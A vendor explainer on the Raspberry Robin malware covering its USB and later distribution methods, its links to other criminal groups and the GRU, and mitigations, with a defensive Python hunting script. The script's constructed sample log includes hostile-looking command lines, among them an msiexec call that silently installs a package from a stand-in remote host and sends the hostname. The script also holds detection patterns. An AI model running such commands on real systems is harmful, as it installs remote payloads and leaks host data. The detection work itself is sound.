Raspberry Robin Malware: A Worm Weaponizing USBs
Raspberry Robin has evolved from a USB-delivered worm to a sophisticated and elusive multipurpose malware that spreads via a range of advanced distribution methods. With ties to the Russian state, this malware isn’t going anywhere, and organizations need a proper security strategy to stay safe.
Introduction to Raspberry Robin Malware
Raspberry Robin is an advanced malware downloader that was initially spread through USB drives and other removable storage devices. In its early days as USB malware, a Raspberry Robin infection fetched and ran its next-stage payload by abusing the legitimate Windows Installer (msiexec.exe), rather than by exploiting a vulnerability in it.
These campaigns have since expanded from USB malware to a number of more impactful distribution vectors, including:
- Discord
- N-day vulnerabilities
- Malicious adverts
- Windows script files and command lines
The malware was identified by cybersecurity company Red Canary in September 2021 as a cluster with worm-like capabilities. Details on the Raspberry Robin Worm malware, including its naming, were first revealed in a May 2022 blog.
Since then, significant research on the malware has been conducted, with other security experts sharing their findings, including Microsoft, who identified artifacts related to Raspberry Robin dating back to 2019.
Why It’s Difficult to Analyze
While Raspberry Robin infections pose significant risks, analyzing the threat has been challenging because of:
- The malware's evasion and anti-analysis techniques
- The operational methodologies employed by the threat actor
Although USB media is a common and unsophisticated delivery mechanism, the Raspberry Robin worm itself demonstrated sophisticated obfuscation and anti-analysis techniques from the outset. The threat actor now employs a range of exploits and capabilities to evade detection and defeat sandbox security controls.
Examples include multi-layer packing, with samples observed wrapped in up to 14 layers, each of which must be unpacked before the core logic can be examined.
Research has tracked the increasing number of campaigns as the malware grew from an interesting activity cluster into a widely distributed malicious downloader. But the threat actor behind it remains unknown, and the activity is tracked by different vendors under a number of names, including:
- Roshtyak
- QNAP-Worm
- LINK_MSIEXEC
- Storm-0856
- DEV-0856
Once it has gained initial access to a victim's device, Raspberry Robin is used as a loader to drop other malicious software such as ransomware, stealers, and crypto miners. Observed follow-on payloads delivered by the malware include Truebot, Bumblebee, and IcedID.
How Raspberry Robin Spreads
Here’s how it spreads:
USB propagation
Early Raspberry Robin worm attacks, up until 2023, propagated through infected USB devices. Many of the infected drives had previously been used at print and copy shops or mailing centers.
Here’s a breakdown of USB propagation and how it infects devices to deliver malicious payloads:
- The user unknowingly inserts the infected USB device into a system.
- They then open a file on the device that is disguised as a folder.
- The "folder" is actually a Windows shortcut (.LNK) file that starts a cmd.exe process.
- That command invokes the legitimate Windows Installer (msiexec.exe) to fetch the next stage from attacker-controlled infrastructure, transferring information about the device, such as its hostname, in the request.
- If the download succeeds, the payload is installed as a DLL with a randomly generated name.
- Once running, the DLL verifies connectivity and reaches its command-and-control (C2) servers through continuous callouts to Tor nodes.
Raspberry Robin Malware Targets
In its early days, the worm delivered through USB devices mainly targeted companies outside of the US. Countries where Raspberry Robin was most active included:
- Argentina
- Australia
- Mexico
- Croatia
Industries targeted included:
- Technology
- Manufacturing
- Government agencies
But with its transition to new distribution methods, it has become more active in the United States.
Data from Check Point’s State of Cybersecurity Report shows it accounted for 3% of the multipurpose malware observed in the US during 2024.
This malware now targets a large number of corporations across different industries and locations. The consensus among experts is that Raspberry Robin does not target specific industries or countries.
Evolving Distribution Methods
Although previously infected USB drives remain in circulation, analysis from 2024 indicates that Raspberry Robin no longer actively spreads via USB. It now runs sophisticated campaigns against corporate networks while acting as an initial access broker (IAB) for several serious cybercrime groups.
The malware’s distribution methods now include:
- Using Discord to send users archive files as attachments. Each archive contains a legitimately signed Windows executable together with a DLL carrying the Raspberry Robin payload; when the user runs the executable, it side-loads the malicious DLL from the same directory, so the initial process looks like trusted, signed software.
- 7-Zip archive files downloaded through a web browser that contain a malicious Windows Installer package which infects the device when run.
- Since 2024, many of these archive-based attacks have transitioned to Windows Script Files (.wsf). These files are distributed via malicious domains and subdomains, as well as through malicious advertising.
- Making use of 1-day or n-day exploits shortly after a vulnerability is disclosed, often before exploit code is publicly available. Unlike zero-days, these are known, patchable vulnerabilities; the attacker's window of opportunity is the gap between disclosure and the victim applying the fix. Such exploits have typically been used in attacks targeting QNAP systems and IoT devices, and Raspberry Robin's operators are thought to buy them from other parties rather than develop them in-house.
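To show what the infection chains described above look like from the defender's side, here is an added example (not Check Point's code, nor any vendor's detection content) of simple hunting heuristics run over process-creation events: the shortcut-to-cmd.exe-to-msiexec chain from the USB stage, Windows Installer packages run from download directories, and script hosts executing .wsf files from user-writable paths. The log format, field names, hostnames, URLs and command lines are all constructed for the example and are not captured indicators.

```python
"""Hunt for Raspberry Robin-style process chains in process-creation telemetry.

Added example for this article, not Check Point's or any vendor's detection
content. Log lines are constructed to resemble Sysmon Event ID 1 fields
(host, parent image, image, command line); the field names and the sample
commands are assumptions, not captured indicators.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    severity: str
    cmdline: str


# Constructed sample telemetry (not real logs): one event per line, key=value
# pairs, values quoted when they contain spaces.
SAMPLE_LOG = r'''
host=ws01 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\cmd.exe" cmdline="cmd.exe /R type e:\README.log | cmd"
host=ws01 parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\msiexec.exe" cmdline="msiexec.exe /q /i http://nas.example.test:8080/x/ws01=user"
host=ws02 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\msiexec.exe" cmdline="msiexec.exe /i C:\Users\alice\Downloads\setup.msi"
host=ws03 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\wscript.exe" cmdline="wscript.exe C:\Users\bob\Downloads\invoice_2024.wsf"
host=ws04 parent="C:\Windows\explorer.exe" image="C:\Program Files\7-Zip\7zG.exe" cmdline="7zG.exe x report.7z"
host=ws05 parent="C:\Windows\System32\svchost.exe" image="C:\Windows\System32\msiexec.exe" cmdline="msiexec.exe /i https://updates.example.test/agent.msi /qn"
'''

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
_URL = re.compile(r'https?://', re.I)
_USER_DIR = re.compile(r'\\(?:Downloads|Temp)\\', re.I)
_SCRIPT_EXT = re.compile(r'\.(?:wsf|js|jse|vbs|vbe)\b', re.I)
_TYPE_PIPE_CMD = re.compile(r'\btype\b.*\|\s*cmd\b', re.I)


def parse_events(log_text):
    """Parse key=value process-creation lines into ProcEvent records."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        fields = {k: (q or u) for k, q, u in _KV.findall(line)}
        events.append(ProcEvent(fields["host"], fields["parent"],
                                fields["image"], fields["cmdline"]))
    return events


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Apply the heuristics to one event and return any findings."""
    parent, image, cmd = _base(ev.parent), _base(ev.image), ev.cmdline
    findings = []

    if image == "cmd.exe" and parent == "explorer.exe" and _TYPE_PIPE_CMD.search(cmd):
        # Shortcut stage: explorer launching cmd.exe that "type"s a file into a
        # second cmd.exe. The exact launcher form used here is an assumption.
        findings.append(Finding(ev.host, "cmd_type_pipe_cmd", "medium", cmd))

    if image == "msiexec.exe" and _URL.search(cmd):
        # Windows Installer pulling a package from a remote URL. Spawned by
        # cmd.exe this is the USB chain; other parents still deserve review.
        sev = "high" if parent == "cmd.exe" else "medium"
        findings.append(Finding(ev.host, "msiexec_remote_package", sev, cmd))
    elif image == "msiexec.exe" and _USER_DIR.search(cmd):
        # Installer package run from a download or temp directory, as with
        # installers delivered inside browser-downloaded archives.
        findings.append(Finding(ev.host, "msiexec_from_user_dir", "low", cmd))

    if image in ("wscript.exe", "cscript.exe") and _SCRIPT_EXT.search(cmd) \
            and _USER_DIR.search(cmd):
        # Script host running a .wsf/.js/.vbs from a user-writable directory.
        findings.append(Finding(ev.host, "script_host_user_dir", "high", cmd))

    return findings


def hunt(log_text):
    """Parse the log and return all findings in event order."""
    return [f for ev in parse_events(log_text) for f in evaluate(ev)]


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f.host:5} {f.severity:6} {f.rule:24} {f.cmdline}")
```

The rules deliberately key on parent/child relationships and command-line shape rather than file hashes or domains, which is the behavior-based approach the mitigation section below calls for; expect the low-severity installer rule to be noisy in environments where users install software themselves, and tune it against a known-good baseline before alerting on it. DLL side-loading from the Discord archives is not visible in process-creation events alone and needs image-load telemetry.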
Connections to Other Threat Actors
The operators of Raspberry Robin are known to sell access to corporate networks to other threat actors. The groups, and the malware families they operate, that have been linked to this access include:
- Clop
- Evil Corp
- SocGholish
- Dridex
- Silence (aka Whisper Spider)
- LockBit
Acting as an IAB that delivers payloads for other threat actors makes it more challenging to identify Raspberry Robin's involvement in an intrusion. These collaborations with other hacking groups are also thought to be how its operators acquire n-day exploits rather than developing them themselves.
In September 2024, the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the NSA released a joint advisory stating that Raspberry Robin is associated with the Russian GRU, the country’s military intelligence agency.
In particular, Raspberry Robin is linked to the 161st Specialist Training Center (GRU Unit 29155), a unit thought to be behind assassinations abroad and other activities that aim to destabilize foreign powers.
Raspberry Robin Mitigation Strategies
Raspberry Robin represents a sophisticated threat, employing a range of malware evasion techniques and obfuscation techniques that make it difficult to detect and respond to.
However, there are mitigation strategies that can help protect your business, such as:
- Proactive patch management, updating all of your software as quickly as possible to shrink the window of opportunity for n-day exploits.
- Controls on the delivery vectors described above: restricting or monitoring removable media, blocking execution of script files (.wsf, .js, .vbs) that arrive via browser downloads or chat attachments, and restricting Windows Installer (msiexec.exe) from fetching packages over the network where your environment allows.
- Extensive security training to teach users about potential malware distribution methods and limit their impact.
- Incident response plans, exercised through simulations based on Raspberry Robin or similar attack vectors, so the team learns how to handle such incidents effectively.
- Monitoring network traffic with behavior-based threat detection to identify attacks without relying on previously studied signatures.
- Network segmentation that isolates your most critical infrastructure and limits lateral movement.
- Cybersecurity platforms that offer extensive malware protections and comprehensive endpoint protection.
Malware Protection with Check Point
As Raspberry Robin malware evolves its distribution methods and grows in sophistication, organizations can no longer rely on traditional security strategies. They need to evolve with the threat landscape and find new security tools that meet the level of sophistication now present in multipurpose malware attacks.
Harmony Endpoint from Check Point does just that, delivering complete endpoint security to protect you.
Request a demo to see Harmony Endpoint in action or learn more by downloading its solution brief, which details the latest malware security controls.
